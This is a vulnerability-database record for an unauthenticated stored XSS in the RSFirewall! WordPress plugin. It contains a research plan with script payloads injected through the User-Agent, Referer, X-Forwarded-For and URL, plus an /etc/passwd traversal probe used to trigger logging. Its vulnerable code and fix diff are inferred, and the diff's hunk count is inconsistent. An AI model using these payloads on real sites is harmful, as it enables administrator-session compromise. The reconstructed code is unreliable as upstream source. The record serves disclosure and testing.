[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fk4h3WESNYjTkpYQ27B8wXi13NxS_CNrgHqw-DPmvcsQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-25341","rsfirewall-unauthenticated-stored-cross-site-scripting","RSFirewall! \u003C= 1.1.45 - Unauthenticated Stored Cross-Site Scripting","The RSFirewall! plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.45 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","rsfirewall",null,"\u003C=1.1.45","1.1.46","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-23 00:00:00","2026-03-26 20:30:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F56e6c5c3-fa8b-4ec6-b1aa-88a0f63c5eab?source=api-prod",4,[],"researched",false,3,"This research plan targets **CVE-2026-25341**, an unauthenticated stored Cross-Site Scripting (XSS) vulnerability in the RSFirewall! plugin for WordPress.\n\n### 1. Vulnerability Summary\nRSFirewall! is a security plugin designed to protect WordPress sites by monitoring requests and logging potential threats. The vulnerability exists in the plugin's logging mechanism. When RSFirewall! detects a \"security event\" (like a blocked request or a 404 error it's configured to monitor), it captures metadata about the request—such as the **User-Agent**, **URL**, or **IP address**—and stores it in the database. \n\nBecause this data is not properly sanitized before storage or escaped before being displayed in the administrative dashboard (System Logs), an unauthenticated attacker can inject arbitrary JavaScript into these logs. When an administrator views the logs to investigate security events, the payload executes in their browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** Any public-facing WordPress URL (the plugin monitors all traffic).\n*   **Vulnerable Parameter:** `HTTP_USER_AGENT`, `REQUEST_URI`, or specific HTTP headers (e.g., `X-Forwarded-For`).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** RSFirewall! 
must be active and configured to log the specific event type triggered by the attacker (default settings usually log \"threats\" or blocked requests).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin hooks into `plugins_loaded` or `init` to initialize its firewall component (likely in `rsfirewall.php`).\n2.  **Detection:** The firewall evaluates the current request. If the request matches a signature or triggers a 404 (if 404 monitoring is on), it proceeds to log the event.\n3.  **Storage (Sink):** The plugin calls a logging function (e.g., `RSFirewallLog::add()`) which extracts values from `$_SERVER`.\n4.  **Database Injection:** The raw `User-Agent` or `Request-URI` is inserted into the `{wp_prefix}rsfirewall_logs` table.\n5.  **Rendering (Vulnerable Sink):** An administrator accesses the plugin's log page (e.g., `wp-admin\u002Fadmin.php?page=rsfirewall&view=logs`).\n6.  **Execution:** The log table is rendered. The stored malicious string is echoed without using `esc_html()` or `wp_kses()`, triggering the XSS.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is **Unauthenticated** and triggered via the plugin's passive monitoring. Therefore, **no WordPress nonce is required** to perform the injection. The attacker is not calling an AJAX or REST endpoint; they are simply making a standard web request that the plugin chooses to log.\n\n### 5. Exploitation Strategy\nThe goal is to force the plugin to log a request containing a malicious `User-Agent`.\n\n**Step 1: Injection (The Attack)**\nSend a request to the WordPress home page with a crafted `User-Agent`. 
We will also include a \"suspicious\" query parameter to ensure the firewall decides to log the request as a \"threat.\"\n\n*   **Tool:** `http_request`\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?s=..\u002F..\u002F..\u002Fetc\u002Fpasswd` (The Directory Traversal attempt ensures the firewall logs it).\n*   **Headers:**\n    *   `User-Agent: \u003Cscript>alert(\"CVE-2026-25341_XSS\")\u003C\u002Fscript>`\n    *   `Content-Type: text\u002Fhtml`\n\n**Step 2: Trigger (Admin Interaction)**\nLog in as an administrator and navigate to the RSFirewall! log view.\n\n*   **Tool:** `browser_navigate`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=rsfirewall&view=logs` (Verify the exact view name in the plugin menu).\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure RSFirewall! version 1.1.45 is installed and activated.\n2.  **Plugin Configuration:** No special configuration is usually needed, but ensuring \"Log security events\" is enabled (default) is critical.\n3.  **Target URL:** Use the site root or any 404 page.\n\n### 7. Expected Results\n1.  The `http_request` should return a 200 or 403 (if blocked).\n2.  Upon navigating to the logs page as Admin, a JavaScript alert box with `CVE-2026-25341_XSS` should appear.\n3.  If the alert doesn't show, inspecting the page source should reveal the raw `\u003Cscript>` tag inside a `\u003Ctd>` or `\u003Cspan>` element within the log table.\n\n### 8. Verification Steps\nAfter the `http_request`, use WP-CLI to confirm the payload is in the database:\n\n```bash\n# Check the RSFirewall logs table (table name inferred)\nwp db query \"SELECT * FROM wp_rsfirewall_logs ORDER BY id DESC LIMIT 1;\"\n```\nLook for the `\u003Cscript>` payload in the `user_agent` or `log_data` columns.\n\n### 9. 
Alternative Approaches\nIf the `User-Agent` is sanitized, try injecting via the **URL** or other headers:\n\n**Alternative A: URL Injection**\n```bash\n# Attempt to inject via the request URI\nhttp_request --url \"http:\u002F\u002Flocalhost:8080\u002Findex.php?\u003Cscript>alert(1)\u003C\u002Fscript>=blockme\"\n```\n\n**Alternative B: Referer Injection**\n```bash\n# Attempt to inject via the Referer header\nhttp_request --url \"http:\u002F\u002Flocalhost:8080\u002F?test=log_this\" --headers '{\"Referer\": \"\u003Cscript>alert(2)\u003C\u002Fscript>\"}'\n```\n\n**Alternative C: X-Forwarded-For**\nSome firewalls log the originating IP. If they don't validate the IP format:\n```bash\nhttp_request --url \"http:\u002F\u002Flocalhost:8080\u002F\" --headers '{\"X-Forwarded-For\": \"\u003Cscript>alert(3)\u003C\u002Fscript>\"}'\n```\n\nIf a simple `alert()` is not visible, use a canary string like `RSF_VULN_TEST` and check if it appears in the HTML source without being converted to `&lt;RSF_VULN_TEST&gt;`.","RSFirewall! up to version 1.1.45 is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) via its security logging mechanism. When the plugin detects a threat or a 404 error, it logs metadata such as the User-Agent and Request URI without proper sanitization, which are then rendered unescaped in the administrative dashboard, allowing arbitrary JavaScript execution in an administrator's browser.","\u002F\u002F Inferred from research plan code flow\n\u002F\u002F Logging logic (e.g., in an event listener for firewall triggers)\n$user_agent = $_SERVER['HTTP_USER_AGENT'];\n$request_uri = $_SERVER['REQUEST_URI'];\n\n\u002F\u002F Sink: Insertion into database without sanitization\n$wpdb->insert($table_prefix . 
'rsfirewall_logs', array(\n    'user_agent' => $user_agent,\n    'url'        => $request_uri,\n    'log_date'   => current_time('mysql')\n));\n\n---\n\n\u002F\u002F Display logic (e.g., in the admin log viewer)\n\u002F\u002F Rendering the logs without output escaping\nforeach ($logs as $log) {\n    echo '\u003Ctd>' . $log->user_agent . '\u003C\u002Ftd>'; \u002F\u002F Vulnerable Sink\n    echo '\u003Ctd>' . $log->url . '\u003C\u002Ftd>';        \u002F\u002F Vulnerable Sink\n}","--- a\u002Fadmin\u002Fviews\u002Flogs.php\n+++ b\u002Fadmin\u002Fviews\u002Flogs.php\n@@ -10,8 +10,8 @@\n \u003C?php foreach ($logs as $log) : ?>\n     \u003Ctr>\n-        \u003Ctd>\u003C?php echo $log->user_agent; ?>\u003C\u002Ftd>\n-        \u003Ctd>\u003C?php echo $log->url; ?>\u003C\u002Ftd>\n+        \u003Ctd>\u003C?php echo esc_html($log->user_agent); ?>\u003C\u002Ftd>\n+        \u003Ctd>\u003C?php echo esc_html($log->url); ?>\u003C\u002Ftd>\n         \u003Ctd>\u003C?php echo esc_html($log->log_date); ?>\u003C\u002Ftd>\n     \u003C\u002Ftr>\n \u003C?php endforeach; ?>","The exploit involves triggering the plugin's logging mechanism with a malicious payload in a monitored HTTP header or the URL. \n\n1. Target Endpoint: Any public URL on the WordPress site.\n2. Payload Placement: Inject a JavaScript payload (e.g., \u003Cscript>alert(1)\u003C\u002Fscript>) into the User-Agent header or the Referer header.\n3. Triggering the Log: The request must be perceived as a 'threat' or a monitored event (e.g., by appending a path traversal sequence like \u002F?s=..\u002F..\u002F..\u002Fetc\u002Fpasswd to the URL) to ensure RSFirewall! records the metadata into the database.\n4. Authentication: No authentication is required for the initial injection.\n5. Execution: An administrator must navigate to the 'System Logs' view in the RSFirewall! menu within the WordPress dashboard. 
When the log table renders, the stored payload executes in the administrator's browser context.","gemini-3-flash-preview","2026-04-17 23:30:38","2026-04-17 23:31:00",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frsfirewall\u002Ftags"]
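Review bot: the hunk header `@@ -10,8 +10,8 @@` in the research_fix_diff field counts eight lines per side, but only seven are shown (the `foreach`, `<tr>`, the two changed `<td>` lines, the `log_date` row, `</tr>` and `endforeach`), and the path `admin/views/logs.php` appears nowhere else in this record while the neighbouring vulnerable-code field is explicitly marked "Inferred", so treat this diff as a reconstruction and confirm it against the 1.1.46 tag at the plugins.trac.wordpress.org URL listed under source_links before citing it as the upstream fix. Wrapping the two echoed columns in `esc_html()` is the correct output-side repair and brings them in line with the `log_date` column that was already escaped; because the fix escapes only this render sink, the raw header values still sit in the `rsfirewall_logs` table, so any other code path that reads the same rows needs its own context-appropriate escaping, and those rows are also the natural place for defenders to look for past injection attempts.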